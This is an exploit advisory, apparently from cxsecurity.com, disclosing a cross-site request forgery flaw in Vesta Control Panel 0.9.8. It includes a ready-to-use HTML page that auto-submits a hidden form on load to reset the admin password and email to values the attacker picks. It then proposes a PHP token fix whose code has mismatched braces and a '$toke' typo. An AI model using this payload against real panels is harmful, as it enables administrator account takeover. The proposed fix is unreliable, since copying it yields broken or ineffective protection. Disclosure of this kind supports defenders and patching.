Vesta Control Panel 0.9.8 Cross Site Request Forgery

2015.05.26
Credit: Ben Khlifa Fahmi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Vesta Control Panel CSRF(change admin password) # Date: 24-05-2015 # Exploit Author: Ben Khlifa Fahmi # Vendor Homepage: https://vestacp.com/ # Software Link: http://vestacp.com/pub/vst-install.sh # Version: 0.9.8(amd64) # Tested on: ubuntu trusty 14.04 Description: --------------------------------------------------------------- The vulnerability exist on the page /edit/user/index.php The VESTA CP is vulnerable to CSRF Where an attacker can change "admin" password by sending to already logged in user , once the victim visit the page the user password will changed to the one has been set by attacker. Exploit Code : <html> <head><title>Victim will redirect auto</title></head> <body onload="document.forms[0].submit()"> <form> <form id="vstobjects" method="post" name="v_edit_user" action="https://[target]:8083/edit/user/?user=admin"> <input type="hidden" name="v_user" value="admin" > <input type="hidden" name="v_username" value="admin"> <input type="hidden" name="v_password" value="[hacker pass]"> <input type="hidden" name="v_email" value="[hacker mail]"> <input type="hidden" name="v_package" value="default" /> <input type="hidden" name="v_language" value="ar" /> <input type="hidden" name="v_fname" value="System"> <input type="hidden" name="v_lname" value="Administrator"> <input type="hidden" name="v_shell" value="bash" /> <input type="hidden" value="ns1.localhost.ltd"> <input type="hidden" value="ns2.localhost.ltd"> <input type="hidden" name="v_ns3"> <input type="hidden" name="v_ns4"> <input type="submit" class="button" name="save" value="Save"> </form> </body> </html> Impact : Critical as an attacker can change admin email , password, dns .... Solution : add this code to the page /edit/user/index.php after the session start $token = uniqid(mt_rand(), true); if(!isset($_POST)){ $_SESSION['token'] = $token; } if(isset($_POST['token'])) if(!($_SESSION['token'] === $_POST['token'])){ header('location: /error/'); } } and at the end of page add $_SESSION['token'] = $toke; also don't forget to add this html just in the form on page : <form id="vstobjects" method="post" name="v_edit_user"> <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>"/> Greetz to : ArabOUG Cyber Security Team, Tunisian Whitehat Security , Tunisian Agency of Internet Team , BenCure CERT Team(Ben Yahia Mohamed, Ben Salem Salma, Ben khlifa Fahmi(me), Moez Chakchouk, Ben Mne Tarek) Amine Zemzemi , Saif Bejaoui , Mohamed Amen Allah Bechikh , Youssef Warheni , Manel Nouali , Ben Gharbia Jihed , and all my friends And a special Greetz to my fianc <3


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top